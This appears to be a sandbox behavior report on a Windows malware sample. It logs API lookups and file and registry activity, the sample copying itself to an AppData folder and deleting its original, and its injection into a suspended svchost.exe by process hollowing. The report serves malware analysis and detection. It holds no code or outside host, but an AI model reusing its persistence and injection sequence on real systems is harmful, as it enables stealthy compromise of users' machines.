| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x74cc469b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x74cc1282 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x74cc2d3c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x74cc1856 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpynA, address_out = 0x74cd192a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x74cc186e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x74cc17d1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x74cc3ed3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x74cc14b1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x74cc4950 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x74cc11a9 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75570000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfW, address_out = 0x755ae061 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x7559ae5f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x75591218 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyA, address_out = 0x750dcd01 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyW, address_out = 0x750e2459 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x750dcf31 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyExA, address_out = 0x750e1481 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x750e431c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x750e0e0c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExA, address_out = 0x750e14b3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExA, address_out = 0x750e48ef |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorA, address_out = 0x750dca94 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x750e4304 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExA, address_out = 0x750e4907 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x750e46ad |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x750e469d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x750e0e24 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyA, address_out = 0x750dcc15 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x758a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x758c1e46 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x768c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x769009ad |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x769086d3 |
|
1 | |
| Module | Get Filename | module_name = c:\users\public\229393.exe, process_name = c:\users\public\229393.exe, file_name_orig = C:\Users\Public\229393.exe, size = 260 |
|
1 |
Thread 0x7e8
111
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Cursor | x_out = 471, y_out = 474 |
|
1 | |
| System | Get Cursor | x_out = 631, y_out = 474 |
|
38 | |
| System | Get Cursor | x_out = 791, y_out = 474 |
|
6 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x74cc195e |
|
1 | |
| File | Create | filename = C:\Users\Public\229393.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\Public\229393.exe, filename = C:\Users\Public\229393.exe, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\Public\229393.exe, process_name = c:\users\public\229393.exe, desired_access = FILE_MAP_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Public\229393.exe, type = size |
|
1 | |
| Module | Load | module_name = USER32.DLL, base_address = 0x75570000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = FindWindowA, address_out = 0x7558ffe6 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\user32.dll, base_address = 0x75570000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetWindowThreadProcessId, address_out = 0x755891b4 |
|
1 | |
| Window | Find | class_name = ProgMan |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x770d0000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Wow64EnableWow64FsRedirection, address_out = 0x74cdebe8 |
|
1 | |
| File | Create | filename = C:\Windows\system32\c_1252.nls, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\c_1252.nls, type = time |
|
1 | |
| File | Create | filename = C:\Windows\system32\c_1252.nls, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\c_1252.nls, type = time |
|
1 | |
| File | Create | filename = C:\Windows\system32\c_1252.nls, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\c_1252.nls, type = time |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, value_name = api--1-0, data = 144, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_USERS |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
|
1 | |
| Registry | Read Value | reg_name = HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, value_name = AppData, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, value_name = AppData, data = C:\Users\aETAdzjz\AppData\Roaming, type = REG_SZ |
|
1 | |
| File | Create Directory | C:\Users\aETAdzjz\AppData\Roaming\Microsoft |
|
1 | |
| File | Create Directory | C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypore6 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypore6\bdeskmgr.exe, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypore6\bdeskmgr.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypore6\bdeskmgr.exe, size = 2856960 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypore6\bdeskmgr.exe, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypore6\bdeskmgr.exe, size = 4096 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_USERS\S-1-5-21-2345716840-1148442690-1481144037-1000\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580, value_name = Client, data = 0, type = REG_NONE |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS |
|
1 | |
| File | Delete | filename = C:\Users\Public\229393.exe |
|
1 | |
| File | Move | source_filename = C:\Users\Public\229393.exe, flags = MOVEFILE_DELAY_UNTIL_REBOOT |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_SET_SESSIONID, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_DUP_HANDLE, PROCESS_CREATE_PROCESS, PROCESS_SET_QUOTA, PROCESS_SET_INFORMATION, PROCESS_QUERY_INFORMATION, PROCESS_SUSPEND_RESUME, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
1 | |
| Process | Create | process_name = C:\Windows\system32\svchost.exe, os_pid = 0x76c, creation_flags = CREATE_SUSPENDED, CREATE_DEFAULT_ERROR_MODE, show_window = SW_HIDE |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = ZwWow64QueryInformationProcess64, address_out = 0x770f20dc |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = ZwWow64ReadVirtualMemory64, address_out = 0x770f20f4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = ZwWow64QueryInformationProcess64, address_out = 0x770f20dc |
|
1 | |
| Thread | Resume | process_name = c:\users\public\229393.exe, os_tid = 0x7e8 |
|
1 | |
| Thread | Suspend | process_name = c:\users\public\229393.exe, os_tid = 0x7e8 |
|
1 | |
| Thread | Get Context | process_name = c:\users\public\229393.exe, os_tid = 0x7e8 |
|
1 | |
| Module | Create Mapping | protection = PAGE_EXECUTE_READWRITE, maximum_size = 40826360 |
|
1 | |
| Module | Map | process_name = c:\users\public\229393.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x2430000 |
|
1 | |
| Module | Map | process_name = C:\Windows\system32\svchost.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x140000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = ZwWow64QueryInformationProcess64, address_out = 0x770f20dc |
|
6 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x26ef0e0, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 40825052 |
|
1 | |
| Thread | Get Context | process_name = c:\users\public\229393.exe, os_tid = 0x7e8 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 792 |
|
1 | |
| Thread | Set Context | process_name = c:\users\public\229393.exe, os_tid = 0x7e8 |
|
1 | |
| Module | Unmap | process_name = c:\users\public\229393.exe |
|
1 | |
| Memory | Protect | process_name = C:\Windows\system32\svchost.exe, address = 0xffba246c, protection = PAGE_EXECUTE_READWRITE, size = 40826392 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xffba246c, size = 4 |
|
1 | |
| Memory | Protect | process_name = C:\Windows\system32\svchost.exe, address = 0xffba2000, protection = PAGE_EXECUTE_READ, size = 40826392 |
|
1 | |
| Thread | Resume | process_name = c:\users\public\229393.exe, os_tid = 0x7e8 |
|
1 |
Process #5: svchost.exe
261
0
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:47, Reason: Child Process |
| Unmonitor | End Time: 00:02:33, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:46 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x76c |
| Parent PID | 0x8f8 (c:\users\public\229393.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
960
0x
8D8
0x
8D0
0x
8D4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x000affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000000b0000 | 0x000b0000 | 0x000b3fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x000d0000 | 0x00136fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x001c8fff | Pagefile Backed Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d1fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d6fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x001f1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x002fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x003fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x008fffff | Private Memory | Readable, Writable |
|
|
|
- |
| imm32.dll | 0x00400000 | 0x00428fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x00400fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000410000 | 0x00410000 | 0x00410fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000420000 | 0x00420000 | 0x004a8fff | Pagefile Backed Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x008fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000990000 | 0x00990000 | 0x00a0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000a10000 | 0x00a10000 | 0x00b97fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000ba0000 | 0x00ba0000 | 0x00d20fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000d30000 | 0x00d30000 | 0x0212ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002130000 | 0x02130000 | 0x02522fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x02530000 | 0x027fefff | Memory Mapped File | Readable |
|
|
|
- |
| kernel32.dll | 0x76cd0000 | 0x76deefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x76df0000 | 0x76ee9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| psapi.dll | 0x770b0000 | 0x770b6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fffa000 | 0x7fffa000 | 0x7fffafff | Private Memory | Readable, Writable |
|
|
|
- |
| svchost.exe | 0xffba0000 | 0xffbaafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x7fefcd00000 | 0x7fefcd24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x7fefcef0000 | 0x7fefcf5afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x7fefd210000 | 0x7fefd2aefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x7fefd420000 | 0x7fefd44dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x7fefe460000 | 0x7fefe568fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x7fefe590000 | 0x7fefe600fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x7fefe740000 | 0x7fefe7a6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x7fefe7b0000 | 0x7fefe7cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x7fefe7d0000 | 0x7fefe7ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x7fefe7e0000 | 0x7fefe90cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x7fefed50000 | 0x7fefee18fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x7feff120000 | 0x7feff1fafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x7feff210000 | 0x7feff210fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdcfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #4: c:\users\public\229393.exe | 0x7e8 | address = 0x140000, size = 561152 |
|
1 | |
| Modify Memory | #4: c:\users\public\229393.exe | 0x7e8 | address = 0x20000, size = 792 |
|
1 | |
| Modify Control Flow | #4: c:\users\public\229393.exe | 0x7e8 | os_tid = 0x960, address = 0xfffdf000 |
|
1 | |
| Modify Memory | #4: c:\users\public\229393.exe | 0x7e8 | address = 0xffba246c, size = 4 |
|
1 |
Threads
Thread 0x960
261
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = ntdll.dll, base_address = 0x0 |
|
1 | |
| Module | Get Address | function = sprintf, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = NtMapViewOfSection, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = NtUnmapViewOfSection, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = NtCreateSection, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = ZwOpenProcessToken, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = ZwClose, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = ZwQueryInformationToken, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = ZwOpenProcess, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = strcpy, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = NtQuerySystemInformation, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = RtlNtStatusToDosError, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = ZwQueryInformationProcess, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = _snprintf, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = _wcsupr, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = _strupr, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = memmove, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = wcscpy, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = memset, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = RtlFreeUnicodeString, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = ZwQueryKey, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = RtlUpcaseUnicodeString, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = wcstombs, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = RtlAdjustPrivilege, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = mbstowcs, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = RtlImageNtHeader, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = memcpy, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = __C_specific_handler, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x0 |
|
1 | |
| Module | Get Address | function = GetFileAttributesW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = VirtualProtectEx, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = FileTimeToLocalFileTime, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = QueueUserWorkItem, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = FindFirstFileA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = GetFileTime, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = FindNextFileA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = CompareFileTime, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = ExpandEnvironmentStringsA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = GetCurrentProcessId, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = GetVersion, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = GetLocalTime, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = GetModuleFileNameA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = CreateDirectoryA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = GetLastError, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = HeapFree, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = RemoveDirectoryA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = CloseHandle, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = CreateFileA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = DeleteFileA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = lstrcpyA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = lstrlenA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = lstrcatA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = WriteFile, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = HeapAlloc, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = HeapDestroy, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = HeapCreate, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = SetEvent, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = HeapReAlloc, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = GetSystemTimeAsFileTime, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = SuspendThread, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = lstrcmpiW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = ResumeThread, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = GetModuleHandleA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = lstrcpyW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = CreateFileW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = CreateThread, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = lstrcatW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = SwitchToThread, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = Sleep, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = GetTickCount, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = CopyFileW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = SetWaitableTimer, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = GetCurrentThread, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = GetCurrentThreadId, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = DuplicateHandle, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = lstrlenW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = CreateEventA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = GetWindowsDirectoryA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = DeleteFileW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = CreateDirectoryW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = GetTempPathA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = WaitForSingleObject, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = OpenProcess, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = WaitForMultipleObjects, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = lstrcmpA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = ResetEvent, ordinal = 0, address_out = 0xafc80 |
|
1 | |
